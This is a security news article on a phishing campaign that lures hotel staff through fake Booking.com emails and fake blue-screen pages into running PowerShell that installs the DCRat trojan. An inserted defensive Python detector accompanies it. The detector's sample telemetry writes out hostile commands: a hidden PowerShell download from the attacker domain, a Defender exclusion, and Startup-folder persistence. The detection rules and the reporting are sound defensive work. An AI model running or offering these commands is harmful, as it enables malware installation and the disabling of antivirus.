Fake Booking Emails Redirect Hotel Staff to Fake BSoD Pages Delivering DCRat - The Hacker News
Ravie LakshmananJan 06, 2026Malware / Endpoint Security
Source: Securonix
Cybersecurity researchers have disclosed details of a new campaign dubbed PHALT#BLYX that has leveraged ClickFix-style lures presenting a bogus "fix" for a fake blue screen of death (BSoD) error in attacks targeting the European hospitality sector.
The end goal of the multi-stage campaign is to deliver a remote access trojan known as DCRat, according to cybersecurity company Securonix. The activity was detected in late December 2025.
"For initial access, the threat actors utilize a fake Booking.com reservation cancellation lure to trick victims into executing malicious PowerShell commands, which silently fetch and execute remote code," researchers Shikha Sangwan, Akshay Gaikwad, and Aaron Beardslee said.
The starting point of the attack chain is a phishing email impersonating Booking.com that contains a link to a fake website (e.g., "low-house[.]com"). The messages warn recipients of unexpected reservation cancellations, urging them to click the link to confirm the cancellation.
The website to which the victim is redirected masquerades as Booking.com, and serves a fake CAPTCHA page that leads them to a bogus BSoD page with "recovery instructions" to open the Windows Run dialog, paste a command, and press the Enter key. In reality, this results in the execution of a PowerShell command that ultimately deploys DCRat.
Specifically, this entails a multi-step process that commences with the PowerShell dropper downloading an MSBuild project file ("v.proj") from "2fa-bns[.]com". The project file is then executed using "MSBuild.exe" to run an embedded payload that configures Microsoft Defender Antivirus exclusions to evade detection, sets up persistence on the host via the Startup folder, and launches the RAT malware after downloading it from the same location as the MSBuild project.
It's also capable of disabling the security program altogether if it finds itself running with administrator privileges. If it doesn't have elevated rights, the malware enters a loop that triggers a Windows User Account Control (UAC) prompt every two seconds, up to three times, in the hope that the victim will grant it the necessary permissions out of sheer frustration.
In tandem, the PowerShell code opens the legitimate Booking.com admin page in the default browser as a distraction, giving the victim the impression that the action was legitimate.
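As an added illustration that is not part of the Securonix write-up or this article, the following Python sketch shows how a defender could flag the individual stages described above in process-creation telemetry: a PowerShell download-and-execute command spawned from the shell (the Run dialog pattern), MSBuild.exe building a project file on behalf of a script host, Defender exclusion tampering, and a write into the per-user Startup folder. The event format, file paths, user name and the file name client.exe are constructed assumptions; only the domain 2fa-bns[.]com and the file name v.proj come from the write-up.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    """Simplified process-creation record (Sysmon Event ID 1 / EDR style). Constructed format."""
    parent_image: str
    image: str
    command_line: str


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


POWERSHELL = {"powershell.exe", "pwsh.exe"}
SCRIPT_HOSTS = POWERSHELL | {"cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Download-and-execute primitives typically pasted into the Run dialog by ClickFix lures
DOWNLOAD_EXEC = re.compile(
    r"(iwr|invoke-webrequest|downloadstring|downloadfile|iex|invoke-expression|"
    r"-enc(odedcommand)?|-w(indowstyle)?\s+hidden)", re.I)
# Defender exclusion additions or real-time protection being switched off
DEFENDER_TAMPER = re.compile(
    r"(add-mppreference\s+.*-exclusion(path|process|extension)|"
    r"set-mppreference\s+.*-disable(realtimemonitoring|ioavprotection))", re.I)
STARTUP_FOLDER = re.compile(r"\\start menu\\programs\\startup\\", re.I)


def rule_run_dialog_powershell(ev: ProcessEvent):
    # A command pasted into Win+R is spawned by explorer.exe, not by a script or IDE
    if (_basename(ev.parent_image) == "explorer.exe"
            and _basename(ev.image) in POWERSHELL
            and DOWNLOAD_EXEC.search(ev.command_line)):
        return "PowerShell launched from the shell with download/execute primitives (ClickFix pattern)"
    return None


def rule_msbuild_proxy_execution(ev: ProcessEvent):
    # Developers launch MSBuild from an IDE or build server; a script host parent is the LotL signal
    if (_basename(ev.image) == "msbuild.exe"
            and _basename(ev.parent_image) in SCRIPT_HOSTS
            and re.search(r"\.\w*proj\b", ev.command_line, re.I)):
        return "MSBuild.exe spawned by a script host to build a project file (LotL proxy execution)"
    return None


def rule_defender_exclusion_tampering(ev: ProcessEvent):
    if DEFENDER_TAMPER.search(ev.command_line):
        return "Microsoft Defender exclusion or real-time protection tampering"
    return None


def rule_startup_folder_persistence(ev: ProcessEvent):
    if _basename(ev.image) in SCRIPT_HOSTS and STARTUP_FOLDER.search(ev.command_line):
        return "Script host writing into the per-user Startup folder (persistence)"
    return None


RULES = [rule_run_dialog_powershell, rule_msbuild_proxy_execution,
         rule_defender_exclusion_tampering, rule_startup_folder_persistence]


def analyze(events):
    """Return (event_index, rule_name, description) for every rule that fires."""
    findings = []
    for i, ev in enumerate(events):
        for rule in RULES:
            desc = rule(ev)
            if desc:
                findings.append((i, rule.__name__, desc))
    return findings


def chain_detected(findings, min_rules=3):
    """True when enough distinct stages fire on one host to call it a full chain, not one noisy hit."""
    return len({name for _, name, _ in findings}) >= min_rules


# Constructed sample telemetry from a single host (paths, user and client.exe are made up)
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
MSB = r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe"
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe", "notepad.exe"),
    ProcessEvent(r"C:\Windows\explorer.exe", PS,
                 'powershell -w hidden -c "iwr hxxps://2fa-bns[.]com/v.proj -OutFile $env:TEMP\\v.proj"'),
    ProcessEvent(PS, MSB, r"MSBuild.exe C:\Users\staff\AppData\Local\Temp\v.proj"),
    ProcessEvent(MSB, PS, 'powershell Add-MpPreference -ExclusionPath "C:\\Users\\staff\\AppData"'),
    ProcessEvent(PS, r"C:\Windows\System32\cmd.exe",
                 r'cmd /c copy %TEMP%\client.exe "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\client.exe"'),
    # Benign developer build: MSBuild launched by the IDE must not trip the proxy-execution rule
    ProcessEvent(r"C:\Program Files\Microsoft Visual Studio\devenv.exe", MSB, "MSBuild.exe App.csproj"),
]

if __name__ == "__main__":
    hits = analyze(SAMPLE_EVENTS)
    for idx, name, desc in hits:
        print(f"event {idx}: {name}: {desc}")
    print("chain detected:", chain_detected(hits))
```

The per-stage rules are deliberately narrow (explorer.exe parent, script-host parent for MSBuild) to keep developer builds and administrative scripts out of the alert stream; correlating several of them on the same host within a short window, as chain_detected does, is what separates this pattern from an isolated exclusion change.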
DCRat, also called DarkCrystal RAT and a variant of AsyncRAT, is an off-the-shelf .NET trojan that can harvest sensitive information and expand its functionality by means of a plugin-based architecture. It's equipped to connect to an external server, profile the infected system, and await incoming commands from the server, enabling the attackers to log keystrokes, run arbitrary commands, and deliver additional payloads like a cryptocurrency miner.
The campaign is an example of how threat actors are leveraging living-off-the-land (LotL) techniques, such as abusing trusted system binaries like "MSBuild.exe," to move the attack to the next stage, establish a deeper foothold, and maintain persistence within compromised hosts.
"The phishing emails notably feature room charge details in Euros, suggesting the campaign is actively targeting European organizations," Securonix said. "The use of the Russian language within the 'v.proj' MSBuild file links this activity to Russian threat actors using DCRat."
"The use of a customized MSBuild project file to proxy execution, coupled with aggressive tampering of Windows Defender exclusions, demonstrates a deep understanding of modern endpoint protection mechanisms."